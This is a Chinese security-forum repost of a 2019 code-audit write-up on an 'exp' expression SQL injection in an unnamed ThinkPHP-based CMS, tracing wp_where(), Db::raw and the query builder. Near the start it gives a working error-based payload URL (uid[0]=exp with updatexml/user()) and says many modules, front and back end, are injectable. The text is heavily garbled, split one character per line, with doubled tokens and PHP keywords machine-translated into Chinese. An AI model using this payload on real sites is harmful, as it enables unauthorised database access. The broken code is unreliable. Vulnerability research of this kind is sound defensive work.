论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
Web安全
[27966] 2019-12-17_某cms审计之exp表达式注入
文档创建者:
s7ckTeam
浏览次数:
4
最后更新:
2025-01-19
Web安全
4 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-58
6万
主题
-6万
回帖
-58
积分
管理员
积分
-58
发消息
2019-12-17_某cms审计之exp表达式注入
某
c
m
s
审
计
之
e
x
p
表
达
式
注
入
O
t
s
安
全
2
0
1
9
-
1
2
-
1
7
有
效
载
荷
有
效
载
荷
还
有
多
个
模
块
均
存
在
注
入
分
析
分
析
a
p
p
h
o
m
e
c
o
n
t
r
o
l
l
e
r
I
n
d
e
x
:
:
b
i
n
d
_
f
o
l
l
o
w
(
)
u
i
d
直
接
通
过
获
取
h
t
t
p
:
/
/
p
h
p
.
l
o
c
a
l
/
p
u
b
l
i
c
/
i
n
d
e
x
.
p
h
p
/
h
o
m
e
/
i
n
d
e
x
/
b
i
n
d
_
f
o
l
l
o
w
/
?
p
u
b
l
i
c
i
d
=
1
&
i
s
_
a
j
a
x
=
1
&
u
i
d
[
0
]
=
e
x
p
&
u
i
d
[
1
]
=
)
a
n
d
u
p
d
a
t
e
x
m
l
(
1
,
c
o
n
c
a
t
(
0
x
7
e
,
u
s
e
r
(
)
,
0
x
7
e
)
,
1
)
-
-
+
I
(
)
<
?
p
h
p
函
数
函
数
I
(
(
$
n
a
m
e
,
,
$
d
e
f
a
u
l
t
=
'
'
,
,
$
f
i
l
t
e
r
=
n
u
l
l
,
,
$
d
a
t
a
s
=
n
u
l
l
)
)
{
返
回
返
回
输
入
(
(
$
n
a
m
e
,
,
$
d
e
f
a
u
l
t
,
,
$
f
i
l
t
e
r
)
)
;
}
然
后
通
过
-
>
-
>
函
数
<
?
p
h
p
$
i
n
f
o
=
M
(
(
'
u
s
e
r
_
f
o
l
l
o
w
'
)
)
-
>
w
h
e
r
e
(
(
w
p
_
w
h
e
r
e
(
(
$
m
a
p
)
)
)
)
-
>
f
i
n
d
(
)
(
)
;
跟
进
<
?
p
h
p
函
数
函
数
w
p
_
w
h
e
r
e
(
(
$
f
i
e
l
d
)
)
{
i
f
(
(
!
!
i
s
_
a
r
r
a
y
(
(
$
f
i
e
l
d
)
)
)
)
{
返
回
返
回
$
f
i
e
l
d
;
}
$
r
e
s
=
[
]
;
f
o
r
e
a
c
h
(
(
$
f
i
e
l
d
a
s
$
k
e
y
=
>
$
v
a
l
u
e
)
)
{
i
f
(
(
i
s
(
(
i
s
_
n
u
m
e
r
i
c
(
(
$
k
e
y
)
)
|
|
(
(
i
s
_
a
r
r
a
y
(
(
$
v
a
l
u
e
)
)
&
&
c
o
u
n
t
(
(
$
v
a
l
u
e
)
)
=
=
3
)
)
)
)
{
i
f
(
(
s
t
r
t
o
l
o
w
e
r
(
(
$
v
a
l
u
e
[
1
]
)
)
=
=
'
e
x
p
'
&
&
!
!
i
s
_
o
b
j
e
c
t
(
(
$
v
a
l
u
e
[
2
]
)
)
)
)
{
$
v
a
l
u
e
[
2
]
=
D
b
:
:
原
始
(
(
$
v
a
l
u
e
[
2
]
)
;
)
;
}
$
r
e
s
[
]
=
$
v
a
l
u
e
;
}
e
l
s
e
i
f
(
(
i
s
_
a
r
r
a
y
(
(
$
v
a
l
u
e
)
)
)
)
{
i
f
(
(
s
t
r
t
o
l
o
w
e
r
(
(
$
v
a
l
u
e
[
0
]
)
)
=
=
'
e
x
p
'
&
&
!
!
i
s
_
o
b
j
e
c
t
(
(
$
v
a
l
u
e
[
1
]
)
)
)
)
{
$
v
a
l
u
e
[
1
]
=
D
b
:
:
r
a
w
(
(
$
v
a
l
u
e
[
1
]
)
)
;
}
$
r
e
s
[
]
=
[
$
k
e
y
,
,
$
v
a
l
u
e
[
0
]
,
,
$
v
a
l
u
e
[
1
]
]
;
}
e
l
s
e
{
$
r
e
s
[
]
=
[
$
k
e
y
,
,
'
=
'
,
,
$
v
a
l
u
e
]
;
}
}
/
/
d
u
m
p
(
$
r
e
s
)
;
返
回
返
回
$
r
e
s
;
}
w
p
_
w
h
e
r
e
(
)
w
h
e
r
e
(
)
f
i
n
d
(
)
w
p
_
w
h
e
r
e
(
)
在
e
l
s
e
i
f
语
句
中
,
如
果
预
定
的
插
入
是
层
叠
,
并
且
下
标
为
0
的
变
量
e
x
p
,
那
么
会
执
行
来
进
行
表
达
式
查
询
跟
进
进
入
到
,
为
<
?
p
h
p
公
共
公
共
静
态
静
态
函
数
函
数
_
_
c
a
l
l
S
t
a
t
i
c
(
(
$
m
e
t
h
o
d
,
,
$
a
r
g
s
)
)
{
返
回
返
回
c
a
l
l
_
u
s
e
r
_
f
u
n
c
_
a
r
r
a
y
(
(
[
s
t
a
t
i
c
:
:
c
o
n
n
e
c
t
(
)
,
(
)
,
$
m
e
t
h
o
d
]
,
,
$
a
r
g
s
)
)
;
}
c
a
l
l
_
u
s
e
r
_
f
u
n
c
_
a
r
r
a
y
放
入
,
跟
进
D
b
:
:
r
a
w
(
)
D
b
:
:
r
a
w
(
)
t
h
i
n
k
D
b
:
:
_
_
c
a
l
l
S
t
a
t
i
c
$
m
e
t
h
o
d
r
a
w
(
)
[
s
t
a
t
i
c
:
:
c
o
n
n
e
c
t
(
)
,
$
m
e
t
h
o
d
]
s
t
a
t
i
c
:
:
c
o
n
n
e
c
t
(
)
<
?
p
h
p
公
共
公
共
静
态
静
态
函
数
函
数
c
o
n
n
e
c
t
(
(
$
c
o
n
f
i
g
=
[
]
,
,
$
n
a
m
e
=
f
a
l
s
e
,
,
$
q
u
e
r
y
=
'
'
)
)
{
/
/
解
析
配
置
参
数
$
o
p
t
i
o
n
s
=
s
e
l
f
:
:
p
a
r
s
e
C
o
n
f
i
g
(
(
$
c
o
n
f
i
g
?
:
?
:
s
e
l
f
:
:
$
c
o
n
f
i
g
)
)
;
$
q
u
e
r
y
=
$
q
u
e
r
y
?
:
?
:
$
o
p
t
i
o
n
s
[
'
q
u
e
r
y
'
]
;
/
/
创
建
数
据
库
连
接
对
象
实
例
s
e
l
f
:
:
$
c
o
n
n
e
c
t
i
o
n
=
C
o
n
n
e
c
t
i
o
n
:
:
i
n
s
t
a
n
c
e
(
(
$
o
p
t
i
o
n
s
,
,
$
n
a
m
e
)
)
;
返
回
返
回
新
的
新
的
$
q
u
e
r
y
(
(
s
e
l
f
:
:
$
c
o
n
n
e
c
t
i
o
n
)
)
;
}
返
回
的
是
类
,
那
么
c
a
l
l
_
u
s
e
r
_
f
u
n
c
_
a
r
r
a
y
有
时
的
就
是
类
下
的
方
法
。
继
续
跟
进
<
?
p
h
p
/
/
t
h
i
n
k
d
b
Q
u
e
r
y
:
:
r
a
w
公
共
公
共
函
数
函
数
r
a
w
(
(
$
v
a
l
u
e
)
)
{
返
回
返
回
新
的
新
的
E
x
p
r
e
s
s
i
o
n
(
(
$
v
a
l
u
e
)
)
;
}
发
现
返
回
的
是
一
个
表
达
式
,
最
后
返
回
t
h
i
n
k
d
b
Q
u
e
r
y
t
h
i
n
k
d
b
Q
u
e
r
y
r
a
w
(
)
w
p
_
w
h
e
r
e
(
)
r
e
s
进
入
到
w
h
e
r
e
(
)
<
?
p
h
p
公
共
公
共
函
数
函
数
其
中
(
(
$
f
i
e
l
d
,
,
$
o
p
=
n
u
l
l
,
,
$
c
o
n
d
i
t
i
o
n
=
n
u
l
l
)
)
{
$
p
a
r
a
m
=
f
u
n
c
_
g
e
t
_
a
r
g
s
(
)
(
)
;
a
r
r
a
y
_
s
h
i
f
t
(
(
$
p
a
r
a
m
)
)
;
返
回
返
回
$
t
h
i
s
-
>
p
a
r
s
e
W
h
e
r
e
E
x
p
(
(
'
A
N
D
'
,
,
$
f
i
e
l
d
,
,
$
o
p
,
,
$
c
o
n
d
i
t
i
o
n
,
,
$
p
a
r
a
m
)
)
;
}
进
入
p
a
r
s
e
W
h
e
r
e
E
x
p
(
)
<
?
p
h
p
受
保
护
的
受
保
护
的
函
数
函
数
p
a
r
s
e
W
h
e
r
e
E
x
p
(
(
$
l
o
g
i
c
,
,
$
f
i
e
l
d
,
,
$
o
p
,
,
$
c
o
n
d
i
t
i
o
n
,
,
a
r
r
a
y
$
p
a
r
a
m
=
[
]
,
,
$
s
t
r
i
c
t
=
f
a
l
s
e
)
)
{
.
.
.
省
略
i
f
(
(
$
f
i
e
l
d
i
n
s
t
a
n
c
e
o
f
E
x
p
r
e
s
s
i
o
n
)
)
{
返
回
返
回
$
t
h
i
s
-
>
w
h
e
r
e
R
a
w
(
(
$
f
i
e
l
d
,
,
i
s
_
a
r
r
a
y
(
(
$
o
p
)
)
?
?
$
o
p
:
:
[
]
,
,
$
l
o
g
i
c
)
)
;
}
e
l
s
e
i
f
(
(
$
s
t
r
i
c
t
)
)
{
/
/
使
用
严
格
模
式
查
询
$
w
h
e
r
e
=
[
$
f
i
e
l
d
,
,
$
o
p
,
,
$
c
o
n
d
i
t
i
o
n
,
,
$
l
o
g
i
c
]
;
}
e
l
s
e
i
f
(
(
i
s
_
a
r
r
a
y
(
(
$
f
i
e
l
d
)
)
)
)
{
/
/
解
析
批
量
查
询
返
回
返
回
$
t
h
i
s
-
>
p
a
r
s
e
A
r
r
a
y
W
h
e
r
e
I
t
e
m
s
(
(
$
f
i
e
l
d
,
,
$
l
o
g
i
c
)
)
;
}
.
.
.
省
略
返
回
返
回
$
t
h
i
s
;
}
满
足
e
l
s
e
i
f
是
分
段
条
件
,
进
入
到
<
?
p
h
p
受
保
护
的
受
保
护
的
函
数
函
数
p
a
r
s
e
A
r
r
a
y
W
h
e
r
e
I
t
e
m
s
(
(
$
f
i
e
l
d
,
,
$
l
o
g
i
c
)
)
{
i
f
(
(
k
e
y
(
(
$
f
i
e
l
d
)
)
!
!
=
=
0
)
)
{
$
w
h
e
r
e
=
[
]
;
f
o
r
e
a
c
h
(
(
$
f
i
e
l
d
a
s
$
k
e
y
=
>
$
v
a
l
)
)
{
i
f
(
(
$
v
a
l
i
n
s
t
a
n
c
e
o
f
E
x
p
r
e
s
s
i
o
n
)
)
{
$
w
h
e
r
e
[
]
=
[
$
k
e
y
,
,
'
e
x
p
'
,
,
$
v
a
l
]
;
}
e
l
s
e
i
f
(
(
i
s
_
n
u
l
l
(
(
$
v
a
l
)
)
)
)
{
$
w
h
e
r
e
[
]
=
[
$
k
e
y
,
,
'
N
U
L
L
'
,
,
'
'
]
;
}
e
l
s
e
{
$
w
h
e
r
e
[
]
=
[
$
k
e
y
,
,
i
s
_
a
r
r
a
y
(
(
$
v
a
l
)
)
?
?
'
I
N
'
:
:
'
=
'
,
,
$
v
a
l
]
;
}
}
}
e
l
s
e
{
/
/
多
个
批
量
查
询
$
w
h
e
r
e
=
$
f
i
e
l
d
;
}
i
f
(
(
!
!
e
m
p
t
y
(
(
$
w
h
e
r
e
)
)
)
)
{
$
t
h
i
s
-
>
o
p
t
i
o
n
s
[
'
w
h
e
r
e
'
]
[
$
l
o
g
i
c
]
=
i
s
s
e
t
(
(
$
t
h
i
s
-
>
o
p
t
i
o
n
s
[
'
w
h
e
r
e
'
]
[
$
l
o
g
i
c
]
)
)
吗
?
吗
?
a
r
r
a
y
_
m
e
r
g
e
(
(
$
t
h
i
s
-
>
o
p
t
i
o
n
s
[
'
w
h
e
r
e
'
]
[
$
l
o
g
i
c
]
,
,
$
w
h
e
r
e
)
)
:
:
$
w
h
e
r
e
;
}
返
回
返
回
$
t
h
i
s
;
}
合
并
w
h
e
r
e
条
件
之
后
返
回
,
然
后
进
入
到
f
i
n
d
(
)
函
数
p
a
r
s
e
A
r
r
a
y
W
h
e
r
e
I
t
e
m
s
(
)
$
t
h
i
s
<
?
p
h
p
公
共
公
共
函
数
函
数
f
i
n
d
(
(
$
d
a
t
a
=
n
u
l
l
)
)
{
i
f
(
(
$
d
a
t
a
i
n
s
t
a
n
c
e
o
f
Q
u
e
r
y
)
)
{
r
e
t
u
r
n
$
d
a
t
a
-
>
f
i
n
d
(
)
(
)
;
}
e
l
s
e
i
f
(
(
$
d
a
t
a
i
n
s
t
a
n
c
e
o
f
C
l
o
s
u
r
e
)
)
{
$
d
a
t
a
(
(
$
t
h
i
s
)
)
;
$
d
a
t
a
=
n
u
l
l
;
}
$
t
h
i
s
-
>
p
a
r
s
e
O
p
t
i
o
n
s
(
)
(
)
;
i
f
(
(
!
!
i
s
_
n
u
l
l
(
(
$
d
a
t
a
)
)
)
)
{
/
/
A
R
模
式
分
析
主
键
条
件
$
t
h
i
s
-
>
p
a
r
s
e
P
k
W
h
e
r
e
(
(
$
d
a
t
a
)
)
;
}
$
t
h
i
s
-
>
o
p
t
i
o
n
s
[
'
d
a
t
a
'
]
=
$
d
a
t
a
;
$
r
e
s
u
l
t
=
$
t
h
i
s
-
>
连
接
-
>
f
i
n
d
(
(
$
t
h
i
s
)
)
;
i
f
(
(
$
t
h
i
s
-
>
o
p
t
i
o
n
s
[
'
f
e
t
c
h
_
s
q
l
'
]
)
)
{
返
回
返
回
$
r
e
s
u
l
t
;
}
/
/
数
据
处
理
i
f
(
(
e
m
p
t
y
(
(
$
r
e
s
u
l
t
)
)
)
)
{
返
回
返
回
$
t
h
i
s
-
>
r
e
s
u
l
t
T
o
E
m
p
t
y
(
)
(
)
;
}
i
f
(
(
!
!
e
m
p
t
y
(
(
$
t
h
i
s
-
>
m
o
d
e
l
)
)
)
)
{
/
/
返
回
模
型
对
象
$
t
h
i
s
-
>
r
e
s
u
l
t
T
o
M
o
d
e
l
(
(
$
r
e
s
u
l
t
,
,
$
t
h
i
s
-
>
o
p
t
i
o
n
s
)
)
;
}
e
l
s
e
{
$
t
h
i
s
-
>
r
e
s
u
l
t
(
(
$
r
e
s
u
l
t
)
)
;
}
返
回
返
回
$
r
e
s
u
l
t
;
}
进
入
$
t
h
i
s
-
>
c
o
n
n
e
c
t
i
o
n
-
>
f
i
n
d
(
$
t
h
i
s
)
<
?
p
h
p
p
u
b
l
i
c
f
u
n
c
t
i
o
n
f
i
n
d
(
(
Q
u
e
r
y
$
q
u
e
r
y
)
)
{
/
/
分
析
查
询
表
达
式
$
o
p
t
i
o
n
s
=
$
q
u
e
r
y
-
>
g
e
t
O
p
t
i
o
n
s
(
)
(
)
;
$
p
k
=
$
q
u
e
r
y
-
>
g
e
t
P
k
(
(
$
o
p
t
i
o
n
s
)
)
;
$
d
a
t
a
=
$
o
p
t
i
o
n
s
[
'
d
a
t
a
'
]
;
$
q
u
e
r
y
-
>
s
e
t
O
p
t
i
o
n
(
(
'
l
i
m
i
t
'
,
,
1
)
)
;
.
.
.
$
q
u
e
r
y
-
>
s
e
t
O
p
t
i
o
n
(
(
'
d
a
t
a
'
,
,
$
d
a
t
a
)
)
;
复
制
代
码
/
/
生
成
查
询
S
Q
L
$
s
q
l
=
$
t
h
i
s
-
>
b
u
i
l
d
e
r
-
>
s
e
l
e
c
t
(
(
$
q
u
e
r
y
)
)
;
$
q
u
e
r
y
-
>
r
e
m
o
v
e
O
p
t
i
o
n
(
(
'
l
i
m
i
t
'
)
)
;
$
b
i
n
d
=
$
q
u
e
r
y
-
>
g
e
t
B
i
n
d
(
)
(
)
;
i
f
(
(
!
!
e
m
p
t
y
(
(
$
o
p
t
i
o
n
s
[
'
f
e
t
c
h
_
s
q
l
'
]
)
)
)
)
{
/
/
获
取
实
际
执
行
的
S
Q
L
语
句
返
回
返
回
$
t
h
i
s
-
>
g
e
t
R
e
a
l
S
q
l
(
(
$
s
q
l
,
,
$
b
i
n
d
)
)
;
}
/
/
事
件
事
件
$
r
e
s
u
l
t
=
$
q
u
e
r
y
-
>
t
r
i
g
g
e
r
(
(
'
b
e
f
o
r
e
_
f
i
n
d
'
)
)
;
i
f
(
(
!
!
$
r
e
s
u
l
t
)
)
{
/
/
执
行
查
询
$
r
e
s
u
l
t
S
e
t
=
$
t
h
i
s
-
>
查
询
(
(
$
s
q
l
,
,
$
b
i
n
d
,
,
$
o
p
t
i
o
n
s
[
'
m
a
s
t
e
r
'
]
,
,
$
o
p
t
i
o
n
s
[
'
f
e
t
c
h
_
p
d
o
'
]
)
)
;
i
f
(
(
$
r
e
s
u
l
t
S
e
t
i
n
s
t
a
n
c
e
o
f
P
D
O
S
t
a
t
e
m
e
n
t
)
)
{
/
/
返
回
P
D
O
S
t
a
t
e
m
e
n
t
对
象
r
e
t
u
r
n
$
r
e
s
u
l
t
S
e
t
;
}
$
r
e
s
u
l
t
=
i
s
s
e
t
(
(
$
r
e
s
u
l
t
S
e
t
[
0
]
)
)
吗
?
吗
?
$
r
e
s
u
l
t
S
e
t
[
0
]
:
:
空
空
;
;
}
.
.
.
返
回
返
回
$
r
e
s
u
l
t
;
}
在
生
成
S
Q
L
语
句
,
带
入
恶
意
S
Q
L
造
成
注
入
。
$
t
h
i
s
-
>
b
u
i
l
d
e
r
-
>
s
e
l
e
c
t
(
$
q
u
e
r
y
)
影
响
范
围
影
响
范
围
所
有
使
用
了
函
数
和
参
数
可
控
的
S
Q
L
查
询
均
值
受
到
影
响
,
前
台
后
台
均
存
在
注
入
。
w
p
_
w
h
e
r
e
(
)
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
Web安全